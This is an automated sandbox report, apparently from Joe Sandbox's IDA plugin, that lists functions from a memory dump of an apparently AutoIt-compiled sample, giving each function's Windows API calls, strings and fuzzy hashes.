ShowWindow.USER32(00EC57B0,00000000,013B5788,?,?,00EC57B0,?,00E8B5A8,?,?), ref: 00E8B796
ShowWindow.USER32(00000000,00000004,?,00E8B5A8,?,?), ref: 00E8B7A8
EnableWindow.USER32(00000000,00000001), ref: 00E8B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E8B7EF

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
Instruction ID: d973f555af2bc583b5485cc10d16146556380cdf74bd01e29d429fac7c1647d2
Opcode Fuzzy Hash: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
Instruction Fuzzy Hash: 03417534600240AFDB22DF24C499B957BE1FF49314F5852BAE94CAF672C732A856CB50

Function 00E7709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00E74E41,?,?,00000000,00000001), ref: 00E770AC

Part of subcall function 00E739A0: GetWindowRect.USER32(?,?), ref: 00E739B3

GetDesktopWindow.USER32 ref: 00E770D6
GetWindowRect.USER32(00000000), ref: 00E770DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E7710F

Part of subcall function 00E65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC

GetCursorPos.USER32(?), ref: 00E7713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E77199

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 063107fdb35a2b728ed42a04ad106e0c7dd0f65fb417a8e74c17ee171b43f612
Instruction ID: 9f0a9ee602a05e3a59aa7ac9f2132a127ea03dbadd190c92f44a207a335bfdb7
Opcode Fuzzy Hash: 063107fdb35a2b728ed42a04ad106e0c7dd0f65fb417a8e74c17ee171b43f612
Instruction Fuzzy Hash: CA31B272609305AFD720DF14D849B9BB7E9FF88314F004919F589A7191DB70EA19CB92

Function 00E58879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E580C0
Part of subcall function 00E580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E580CA
Part of subcall function 00E580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E580D9
Part of subcall function 00E580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E580E0
Part of subcall function 00E580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E580F6

GetLengthSid.ADVAPI32(?,00000000,00E5842F), ref: 00E588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E588D6
HeapAlloc.KERNEL32(00000000), ref: 00E588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00E588F6
GetProcessHeap.KERNEL32(00000000,00000000,00E5842F), ref: 00E5890A
HeapFree.KERNEL32(00000000), ref: 00E58911

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f50f169a31eb97d998c3865927ab2285b3a6d04a8a57fc795cb94fab51612277
Instruction ID: 7d15b3601cba6f70a9ea4cc0bf1b06b2170f4154a612d8acb6eba432abe5755f
Opcode Fuzzy Hash: f50f169a31eb97d998c3865927ab2285b3a6d04a8a57fc795cb94fab51612277
Instruction Fuzzy Hash: 4511B131501209FFDB149FA5DD09BBEB7A8EB84316F504428E849F7211CB32AD18DB60

Function 00E585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E585E2
OpenProcessToken.ADVAPI32(00000000), ref: 00E585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E585F8
CloseHandle.KERNEL32(00000004), ref: 00E58603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E58632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00E58646

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
Instruction ID: fa7c500b49624219ef57875f2d857e169fb514a7bf048eb022d59f124120b83f
Opcode Fuzzy Hash: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
Instruction Fuzzy Hash: 70115972501209AFDF018FA5DE49BEE7BA9EF08309F144065FE04B2160C7728E68EB60

Function 00E5B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E5B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00E5B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E5B7CD
ReleaseDC.USER32(00000000,00000000), ref: 00E5B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E5B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00E5B7FE

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 78786a452a3d320577c07605b81b9cbef155830014dad882a15da44fc49e91f2
Instruction ID: 5f4a21d749995b0938b4d6a5e553709e6358604d75bbfec0d6baa5a6205b68f3
Opcode Fuzzy Hash: 78786a452a3d320577c07605b81b9cbef155830014dad882a15da44fc49e91f2
Instruction Fuzzy Hash: 6F018475E00209BFEF109BA69C49A5EBFB8EB48351F0041B6FE08B7291D6309C14CF90

Function 00E20162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00E201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E201C1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
Instruction ID: 37620c0a6671a5cec699ac88e052411fee0bf3f1276c3770c25fc5cdfde5b358
Opcode Fuzzy Hash: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
Instruction Fuzzy Hash: 7F016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A868CBE5

Function 00E653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E653F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E6540F
GetWindowThreadProcessId.USER32(?,?), ref: 00E6541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E6542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E65437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E6543E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
Instruction ID: 2a80090c245926b0a5eedaf22d153c79016223f97f31931722b5103823954e97
Opcode Fuzzy Hash: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
Instruction Fuzzy Hash: F7F06D32241558BFE3205BA39C0DEAB7A7CEFCAB11F000269FA09E1051EAA01A0597B5

Function 00E67230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00E67243
EnterCriticalSection.KERNEL32(?,?,00E10EE4,?,?), ref: 00E67254
TerminateThread.KERNEL32(00000000,000001F6,?,00E10EE4,?,?), ref: 00E67261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E10EE4,?,?), ref: 00E6726E

Part of subcall function 00E66C35: CloseHandle.KERNEL32(00000000,?,00E6727B,?,00E10EE4,?,?), ref: 00E66C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00E67281
LeaveCriticalSection.KERNEL32(?,?,00E10EE4,?,?), ref: 00E67288

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
Instruction ID: 568ff789e9dbf2684c05766fc0ad8cb53dfdc57e4cfbe15036995c8e9a4f9a72
Opcode Fuzzy Hash: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
Instruction Fuzzy Hash: 45F0BE36480602EFD7111BA4EC4C9DB7729EF04312B100131F107B00B0CB7A5818CB50

Function 00E58992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E5899D
UnloadUserProfile.USERENV(?,?), ref: 00E589A9
CloseHandle.KERNEL32(?), ref: 00E589B2
CloseHandle.KERNEL32(?), ref: 00E589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00E589C3
HeapFree.KERNEL32(00000000), ref: 00E589CA

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
Instruction ID: 4f38d140f51314c040ab9ea8713d28c79b8c98bc657e8ccc59a5474d20c28a84
Opcode Fuzzy Hash: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
Instruction Fuzzy Hash: B1E0C236004001FFDA011FE2EC0C90ABB69FB89322B108231F219E1075CB329428DB50

Function 00E57530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E576EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57702
CLSIDFromProgID.OLE32(?,?,00000000,00E8FB80,000000FF,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57727
_memcmp.LIBCMT ref: 00E57748

Strings

,,, xrefs: 00E5753D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,
API String ID: 314563124-1556401989
Opcode ID: 1a23ea9f86bcde46a24f37ff1051b410e6c2b16beb8e0bfc3cf1fb347a81e2d2
Instruction ID: c6a084e412996204d473d8448844a35cd25c15a482fa526c6018a00c7cb54ce6
Opcode Fuzzy Hash: 1a23ea9f86bcde46a24f37ff1051b410e6c2b16beb8e0bfc3cf1fb347a81e2d2
Instruction Fuzzy Hash: B0812C71A00109EFCB04DFA4D984DEEB7B9FF89316F204559E945BB250DB71AE0ACB60

Function 00E785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E78613
CharUpperBuffW.USER32(?,?), ref: 00E78722
VariantClear.OLEAUT32(?), ref: 00E7889A

Part of subcall function 00E67562: VariantInit.OLEAUT32(00000000), ref: 00E675A2
Part of subcall function 00E67562: VariantCopy.OLEAUT32(00000000,?), ref: 00E675AB
Part of subcall function 00E67562: VariantClear.OLEAUT32(00000000), ref: 00E675B7

Strings

AUTOIT.ERROR, xrefs: 00E78728
Incorrect Parameter format, xrefs: 00E7864B, 00E7880D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 991b8a0695cab8f725c20eff594638923088d5c57f6e1a1e20d438ae243b78c2
Instruction ID: 54fce3695513c92ba8d57931cb98f424b0f8b9898a8e8e85ac013fd8aa55b383
Opcode Fuzzy Hash: 991b8a0695cab8f725c20eff594638923088d5c57f6e1a1e20d438ae243b78c2
Instruction Fuzzy Hash: EC91AE716043019FCB04DF24C58495BBBE4EF99314F14992EF89AEB3A2DB30E945CB92

Function 00E62A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9

_memset.LIBCMT ref: 00E62B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E62C97

Strings

0, xrefs: 00E62B73

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 981e441b59ce21739de28ae46e0c0bb89a092486d31f64874e557925a53da2af
Instruction ID: 851a3cb442ed8908c1fc4fa27fe538757e7e415a8478144437734647333b7253
Opcode Fuzzy Hash: 981e441b59ce21739de28ae46e0c0bb89a092486d31f64874e557925a53da2af
Instruction Fuzzy Hash: 2651FF71248B009EC7249F28E845A6FB7E8EF94398F042A2DFA94F61D1DB70CC44C792

Function 00E13137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E13277
_memmove.LIBCMT ref: 00E13310
_free.LIBCMT ref: 00E13336
_memmove.LIBCMT ref: 00E133E9

Strings

_, xrefs: 00E13322
3c, xrefs: 00E13225

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c$_
API String ID: 2620147621-4099079164
Opcode ID: 5dcec88a19492014482330217bbdb3a44e9f20a50f176db48545ecc4ed3ad567
Instruction ID: 51bdcff3ff12a974b8081fc9daa03e90854b5b8cc33cff20138bb1ea5fbb9e23
Opcode Fuzzy Hash: 5dcec88a19492014482330217bbdb3a44e9f20a50f176db48545ecc4ed3ad567
Instruction Fuzzy Hash: 89517A71A043418FDB25CF28D480BAEBBE5FF89314F44582DE999A7351DB31E941CB82

Function 00E16192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E16248
_memmove.LIBCMT ref: 00E162E4
_memset.LIBCMT ref: 00E16308

Strings

ERCP, xrefs: 00E161B3
3c, xrefs: 00E162AF

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c$ERCP
API String ID: 2532777613-1756721700
Opcode ID: 43edea1557df9b1c41455973bc1c7cfb4244561b372d3be6b42b4d9460be6e31
Instruction ID: 5ff9e201c49e1aef71b2aba738efa6f1878a88e86192ed7e8d6db177ff64a174
Opcode Fuzzy Hash: 43edea1557df9b1c41455973bc1c7cfb4244561b372d3be6b42b4d9460be6e31
Instruction Fuzzy Hash: 9F51AF71A00705DBDB24CF65C9817EAB7F4EF44308F20596EE94AEB291E770AA84CB40

Function 00E62753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00E62822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EC5890,00000000), ref: 00E6286B

Strings

0, xrefs: 00E627B5

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
Instruction ID: 5bf29ed5aa1e3c9345bff996b870c9296ba5723d84a39298e7fa95b2e3a29e7c
Opcode Fuzzy Hash: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
Instruction Fuzzy Hash: 5D41C0706447019FD724DF28EC44B5ABBE4EF85354F04492DFAA5A72D2D730A805CB62

Function 00E7D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D7C5

Part of subcall function 00E0784B: _memmove.LIBCMT ref: 00E07899

Strings

none, xrefs: 00E7D8A0
stdcall, xrefs: 00E7D847
cdecl, xrefs: 00E7D81C
winapi, xrefs: 00E7D836

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: bb698277f97271238c6e62596b49a10849efcc086b6f71b8c99d4f2a35de646b
Instruction ID: 885eb143d7c04484dec5473b7d87b942dba058cb9ec74f30bc0536abff3418c6
Opcode Fuzzy Hash: bb698277f97271238c6e62596b49a10849efcc086b6f71b8c99d4f2a35de646b
Instruction Fuzzy Hash: 1131AF71908619AFDF04EF54CC919EEB3F4FF44324B10A629E869B76D2DB31A945CB80

